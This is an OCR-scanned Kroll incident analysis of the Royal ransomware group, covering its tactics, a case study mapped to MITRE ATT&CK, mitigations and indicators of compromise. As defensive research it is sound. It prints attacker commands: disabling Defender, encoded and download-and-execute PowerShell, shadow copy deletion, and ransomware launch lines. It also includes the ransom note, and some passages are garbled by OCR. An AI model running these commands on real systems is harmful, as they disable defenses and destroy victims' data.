Royal Ransomware Deep Dive 


q) kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive 


together actors previously associated with Roy/Zeon, Conti and TrickBot malware. Originally 
known as “Zeon” before renaming themselves “Royal” in September 2022, they are not 
considered a ransomware-as-a-service (RaaS) operation because their coding/infrastructure 
are private and not made available to outside actors. Since the start of 2023, they have 
escalated their attacks to focus on top tier corporations for larger ransoms. Their ransoms 
reportedly range from $250,000 to over $2 million. Although known for using the double 
extortion method of both encrypting and exfiltrating data, as of this writing the group does not 
have a data leak site where they publish the names of their victims. 


Until recently, the Royal group was observed primarily targeting systems running Windows 
operating system; however, reports surfaced in February 2023 of a variant able to 
compromise Linux/virtual machines. 
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To gain initial access into a victim network, the group has seemed to favor call-back phishing 
ploys, often impersonating food delivery or software providers needing subscription 
renewals. After a victim calls the telephone number in the phishing email to dispute/cancel 
the supposed subscription, the victim is persuaded by the threat actor to install remote 
access software on their computer, thereby providing the actors with initial access to their 
organization’s network. 


Open and closed-source intelligence has also reported the group exploiting web 
vulnerabilities to compromise networks, indicating a potentially greater level of sophistication 
than the call-back scheme suggests. Another initial access method associated with the group 
is the abuse of Google Ads to deliver malware: users browsing the internet click on ads they 
believe to be legitimate, but ultimately lead to downloads of BatLoader, a multifaceted initial 
access malware. Other tools utilized by Royal include the post exploitation framework Cobalt 
Strike for persistent access along with PowerSploit, common remote access tools and 
exfiltration tools such as MegaCMD and SharpExfiltrate. 


Kroll Case Study 
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Figure 1 - Tactics, Techniques and Procedures (TTPs) of Recent Royal Ransomware 
Investigation 


Initial Exploit 
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In one incident, Kroll’s review of the available evidence suggested that the Royal 
ransomware actors likely gained access into the environment by purchasing their way in from 
an unrelated actor; many actors are known to serve as “brokers” for such access. Kroll 
determined that a renamed version of the remote access and management software 
NetSupport Manager was installed during a previous incident on the victim’s network. In 
Kroll’s experience investigating similar attack patterns, a phishing email most likely delivered 
an .iso file for the software; however, due to the passage of time and normal rollover of logs, 
no remnant of a potential phishing email existed at the time of the investigation. In Kroll’s 
experience, the time between the initial installation of the remote access tool and when it 
was ultimately used by Royal ransomware actors indicated that the software was not 
installed by the ransomware actors, but rather they purchased the access. 


MITRE ATT&CK: T1588: Obtain Capabilities 


Internal Scouting 


Kroll observed the Royal actors using the network scanning tool Netscan to identify network 


shares and other network information. While Netscan is legitimate open-source software, 
many threat actors are known to use it for reconnaissance because the tool is lightweight 
and provides an extensive suite of network scanning capabilities. ADFind was also identified 
as a method to enumerate domain members and groups. In addition, the threat actors used 
batch scripts to ping, or identify, other systems on the network, along with common 
commands such as “net user” and “net localgroup” to gain an understanding of the 
environment. 


MITRE ATT&CK: T1087: Account Discovery 
MITRE ATT&CK: T1016: System Network Configuration Discovery 
MITRE ATT&CK: T1135: Network Share Discovery 


Toolkit Deployment 


The Royal threat actors leveraged legitimate remote access tools such as Splashtop, Atera 
Agent and AnyDesk to maintain command and control (C2) within the environment. The use 
of all of these tools is not uncommon, as they provide guaranteed persistence by ensuring a 
number of channels are available for re-entry. The actors additionally deployed Cobalt Strike 
to maintain control via an HTTPS malleable C2 configuration, commonly with recently 
registered domains (Figure 2). 
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"HttpPostUri": "/jquery-3.3.2.min.js", 
"Malleable_C2_Instructions": [ 
"Remove 1522 bytes from the end", 
"Remove 84 bytes from the beginning", 
"Remove 3931 bytes from the beginning", 
"Base64 URL-safe decode", 
"XOR mask w/ random key" 


], 


Figure 2 - Malleable Cobalt Strike C2 Configuration 


MITRE ATT&CK: T1219: Remote Access Software 
MITRE ATT&CK: T1001: Data Obfuscation 
MITRE ATT&CK: T1573.001: Encrypted Channel: Symmetric Cryptography 


To enable the deployment of the ransomware, Royal actors are known to disable antivirus 
software, such as Microsoft Defender, with PowerShell commands (Figure 3) as well as tools 
such as PowerTool64.exe and GMER to remove endpoint detection and response (EDR) 
software. Both GMER and PowerTool64 are designed to remove rootkit type malware, but 
can also be used maliciously to remove applications at the kernel level. These tools can 
prevent the creation of handles, threads and processes from software such as EDR, which in 
turn can prevent the detection of other malicious tools. 


C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command Set-MpPreference - 
DisableRealtimeMonitoring $true 


Figure 3 - PowerShell Command to Disable Windows Defender 


MITRE ATT&CK: T1562.001: Impair Defenses: Disable or Modify Tools 


Escalation 


Our investigators observed the threat actors leveraging the common post exploitation tool 
PowerSploit, in particular via the Find-LocalAdminAccess module, in order to identify 
machines where the current user has local administrator privileges (Figures 4 and 5). 


powershell -nop -exec bypass -EncodedCommand 

SQBFAFgATAAOAE4AZQB3ACOATWBiAGOAZQB j AHQAIABOAGUAGAAUAFCAZQBiAGMADABpAGUAbgBOACKALgBEA 
G8AdwBuAGWAbwBhAGQAUWBOAH TAaQBuAGCAKAAnNAGgAdABOAHAAOgAVAC8AMQAYADCAL gAWAC4AMAAUADEAOg 
AXxADgAMAAXADUALWANACkKAOWAGAEY AaQBUAGQAL QBMAG8AYwBhAGwAQQBkAGOAaQBUAEEAYWBj AGUACWBZAA= 


Figure 4 - PowerShell PowerSploit Execution 


IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:18015/'); Find- 
LocalAdminAccess 


Figure 5 - PowerSploit Find-LocalAdminAccess 
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MITRE ATT&CK: T1807.001: Account Discovery: Local Account 


Lateral Movement 


Royal actors leverage the information gained from PowerSploit to navigate around the 

network via Remote Desktop Protocol (RDP) before installing remote access tools and 
disabling antivirus/EDR as they land on new devices. Cobalt Strike is also used to pass 
explicit credentials to conduct activities across the network. 


MITRE ATT&CK: T1021.001: Remote Services: Remote Desktop Protocol 


Mission Execution 


As Royal actors employ the double extortion strategy, one of their main aims is to identify 
and exfiltrate sensitive information. The group uses a number of tools to extract files to cloud 
storage stealthily via automations, including SharpExfiltrate and Megacmd.exe. 


MITRE ATT&CK: T1537: Transfer Data to Cloud Account 
MITRE ATT&CK: T1020: Automated Exfiltration 


Once data is exfiltrated, Royal actors will then execute the ransomware binary. This is 
typically undertaken by a batch script that lists computers, the unique identification key and 
the percentage of file encryption to use in values between 1 and 100 (Figure 6). 


start locker.exe -ep 5 -id -path \\ENDPOINT.DOMAIN.COM\C$ 
start locker.exe -ep 5 -id -path \\ENDPOINT2.DOMAIN.COM\C$ 
start locker.exe -ep 5 -id -path \\ENDPOINT3.DOMAIN.COM\C$ 


Figure 6 - Example Batch Script to Launch the Ransomware Binary 


MITRE ATT&CK: T1059.003: Command and Scripting Interpreter: Windows Command Shell 
MITRE ATT&CK: T1064: Scripting 


The analyzed sample depicted in Figure 7 is a 32-bit Portable Executable written in C++; 
Kroll’s malware analysis team was able to determine the exact date and time when this was 
compiled. When run from the command line, the ransomware accepts three arguments: 


e -path (the path to be encrypted) 

e -id (a 32-character alphanumeric ID unique to the victim, which will also be appended 
to the Tor URL) 

e -ep (percentage of the file to be encrypted. It accepts values between 1 and 100, and if 
a value is given that is not in the range 1-100, the ransomware will encrypt 50%) 
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eax, [eax+esi*4) 

offset aPath ; “«path” 
dword ptr [eax] ; lpStringl 
[esp+49E8h+var_49C8], eax 
ds:lstrcmpw 

eax, eax 

short loc_4402CF 


loc_4402CF : 
eax, [esp+49E0h+var_49C8) 
offset ald ; “id” 
dword ptr [eax] ; lpStringl 
ds: lstrcompw 
eax, èx 

short loc 440316 


eax, [esp+49EOhevar_49C8] 
offset aEp : j 
dword ptr [eax] ; 

ds: lstrcmpw 

eax, eax 

eax, [esp+49EOhevar_4900) 
short loc_440358 


Figure 7 - Ransomware Configuration Detailing Command Arguments 


After parsing the command line arguments, the ransomware deletes the Volume Shadow 
Copies to prevent restoration (Figure 8). It achieves this by creating a new vssadmin.exe 
process with the argument "delete shadows /all /quiet". 
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>; size_t 


eax, [espe49E4heCommandtine) 
(3 > int 
eax ; void * 
memset 
esp, OCh 
eax, [(esp+49E0h+ComnandLline) 
offset aDeleteShadowsA ; ~ delete shadows 
eax ; LPwSTR 
ds:wsprintfw 
esp, 8 
[espe49EOheStartupiInfo.cb), 44h ; ‘0’ 
eax, [espe49EOheProcessInformation) 
xmme, xmnd 
qword ptr [espe49EOheStartupInfo.lpReserved), xemo 
qword ptr [espe49EOheStartupInfo.lpTitle], xmnad 
eax ; lpProcessiInformation 
eax, [espe49E4heStartupinfo) 
qword ptr Lesps49EsheStertupinfo. dwY), xmme 
eax lpStartupiInfo 
; lpcurrentOirectory 
; lpEnvironment 
; dwCreationFlags 
; bInheritHandles 
; lpThreadAttributes 
; lpProcessAttributes 
eax, [espe4AdeheCommandl ine] 
qword ptr [espe4A0dheStartupInfo.dwySize), xmne 
eax ; lpCommandline 


offset ApplicationName ; “C:\\Windows\\System32\\vssedein.exe” 


qword ptr [esp+4Aes8heStartupInfo.dwyCountChars), xmme 
qword ptr [espe4Aed8heStartupiInfo.dwklags), xmae 
qword ptr [espe4AeBheStartupiInfo.lpReserved2), xmmd 


qword ptr >e4A08he rtupInfo.hStdout put mee 
Figure 8 - Ransomware Configuration Detailing Volume Shadow Copy Deletion 


The ransomware ensures that the -id parameter is 32 characters long and that the current 
path does not contain certain file extensions (such as .exe, .dll or .bat) or already encrypted 
files (with extension .royal). It then proceeds with the encryption routine, which uses 
Advanced Encryption Standard (AES). It finally writes the ransom note in a file named 
“README.TXT” (Figure 9). The note’s text is contained within the .rdata section of the 
executable, along with the RSA public key and other strings used by the program. 
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Hello! 


If you are reading this, it means that your system were hit by Royal 
ransomware. 

Please contact us via : 

http[:]//royal2xthig3o0u5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid[ .]onion/ 


In the meantime, let us explain this case.It may seem complicated, but it is not! 
Most likely what happened was that you decided to save some money on your security 
infrastructure. 


Alas, as a result your critical data was not only encrypted but also copied from your 


systems on a secure server. 
From there it can be published online.Then anyone on the internet from darknet 


criminals, ACLU journalists, Chinese government(different names for the same thing), 


and even your employees will be able to see your internal documentation: personal 
data, HR reviews, internal lawsuitsand complains, financial reports, accounting, 
intellectual property, and more! 


Fortunately we got you covered! 


Royal offers you a unique deal.For a modest royalty(got it; got it ? ) for our 
pentesting services we will not only provide you with an amazing risk mitigation 
service, 

covering you from reputational, legal, financial, regulatory, and insurance risks, 
but will also provide you with a security review for your systems. 

To put it simply, your files will be decrypted, your data restored and kept 
confidential, and your systems will remain secure. 


Try Royal today and enter the new era of data security! 
We are looking to hearing from you soon! 


Figure 9 - Ransom Note README.TXT Created by the Ransomware Binary 


The link within the ransom note directs the victim to a simple chat portal for the victim to 
negotiate the ransom (Figure 10). 


MITRE ATT&CK: T1486: Data Encrypted for Impact 
MITRE ATT&CK: T1490: Inhibit System Recovery 
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t Royal x 4 


© royal2xthig3ouShd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxed 


Figure 10 - Royal Negotiation Site on Tor (Source: Bleeping Computer) 


If a ransom is not agreed, the actors claim they will post the victim’s exfiltrated information on 
their data leak site. While no data leak site for Royal has been identified as of this writing, 
similar threat actor groups often post a summary of the victim, along with a link to 
view/download the collected victim data. 


Mitre ATT&CK Mapping 


Tactic Technique Procedure 

TA0042 T1588 Obtain capabilities 

TA0001 T1078 Valid accounts 

TA0002 T1059 Command and scripting interpreter 
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T1064 


TAO003 


TA0004 


TA0005 


TA0007 


T1087 


T1135 


TA0008 


TA0009 


TA0011 


T1573.001 


T1001 


TA0010 


T1020 


TA0040 


T1486 


Scripting 


T1078 


T1078 


T1562 


T1049 


Account discovery 


Network share discovery 


T1021 


T1005 


T1219 


Encrypted channel: symmetric 
cryptography 


Data obfuscation 


T1567.002 


Automate exfiltration 


T1490 


Data encrypted for impact 


Recommendations 


Valid accounts 


Valid accounts 


Impair defenses: disable or modify tools 


System network connections discovery 


Remote services 


Data from local system 


Remote access software 


Exfiltration over web service: exfiltration to 


cloud storage 


Inhibit system recovery 
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Kroll has identified recommendations relating to this alert: 


Recommendation 


Monitor PowerShell execution 


Ensure PowerShell is logged 
and create detections for 
encoded script execution. 


Audit user, administrator and 
service accounts 


Ensure accounts have the 
correct access and privileges. 
Implement the principle of 
least privilege. 


Implement multifactor 
authentication 


Multifactor authentication can 
restrict access to sensitive 
areas and can prevent lateral 
movement. 


Review backup strategies 
Ensure multiple backups are 
taken and at least one backup 
is isolated from the network. 
Review remote access tools 
Whitelist and limit the use of 


multiple remote access tools 
within the network. 


Observation 


The threat actor utilized Cobalt Strike. Monitoring 
PowerShell execution can identify malicious activity 
associated with Cobalt Strike. 


The threat actor is often able to install tools on user 
endpoints. Limiting the privileges of users can prevent a 
threat actor from installing malicious software. 


Enabling multifactor authentication can prevent a threat 
actor from moving laterally and accessing sensitive data. 


As a ransomware actor’s main aim is to disrupt business, 
ensuring a viable backup and recovery strategy is in place 
can allow a business to recover quickly. 


Threat actors leverage legitimate remote access tools to 
maintain persistence. Ensure remote access is monitored 
and that only approved remote access tools exist in the 
environment. 


Indicators of Compromise 


The following files and hashes have been identified for the incident. 


File Name 


MD5 Hash Value 
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locker.exe B93FA14627F73DE3274BA15503C916B0 
SharpeExfiltrate.exe 2F5D60C2475B723526F BDADEFF55C3C7 
MEGACmd.exe 9FB7D7A1F50541917972115B7D8265B4 
Gmer.exe 60BF4AE8CC40B0E3E28613657ED2EED8 
Power Tool64.exe FB8535E2BD80CC8044C52A3ED82D390D 
Anydesk.exe 7CF4B655453D28F246C815A953F 48936 
TeamViewer.exe 4F926252E22AFA85E5DA7F83158DB20F 


Support.exe 5A24676210BD317520FE30D048C9A106 


The following external IP addresses were observed during the incident: 


IP Address Comment 
23.106.215[.]16 Cobalt Strike C2 


64.44.102[.]176 Cobalt Strike C2 


Stay Ahead with Kroll 


Cyber Risk 


Incident response, digital forensics, breach notification, managed detection services, 
penetration testing, cyber assessments and advisory. 


24x7 Incident Response 


Enlist experienced responders to handle the entire security incident lifecycle. 


Computer Forensics 
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Kroll's computer forensics experts ensure that no digital evidence is overlooked and assist at 
any stage of an investigation or litigation, regardless of the number or location of data 
sources. 


Cyber Risk Retainer 


Kroll delivers more than a typical incident response retainer—secure a true cyber risk 
retainer with elite digital forensics and incident response capabilities and maximum flexibility 
for proactive and notification services. 


Ransomware Preparedness Assessment 


Kroll’s ransomware preparedness assessment helps your organization avoid ransomware 
attacks by examining 14 crucial security areas and attack vectors. 


Data Recovery and Forensic Analysis 


Kroll's expertise establishes whether data was compromised and to what extent. We uncover 


actionable information, leaving you better prepared to manage a future incident. 


Business Email Compromise (BEC) Response and Investigation 


In a business email compromise (BEC) attack, fast and decisive response can make a 
tremendous difference in limiting financial, reputational and litigation risk. With decades of 
experience investigating BEC scams across a variety of platforms and proprietary forensic 
tools, Kroll is your ultimate BEC response partner. 


Incident Remediation and Recovery Services 


Cyber incident remediation and recovery services are part of Kroll’s Complete Response 
capabilities, expediting system recovery and minimizing business disruption. 
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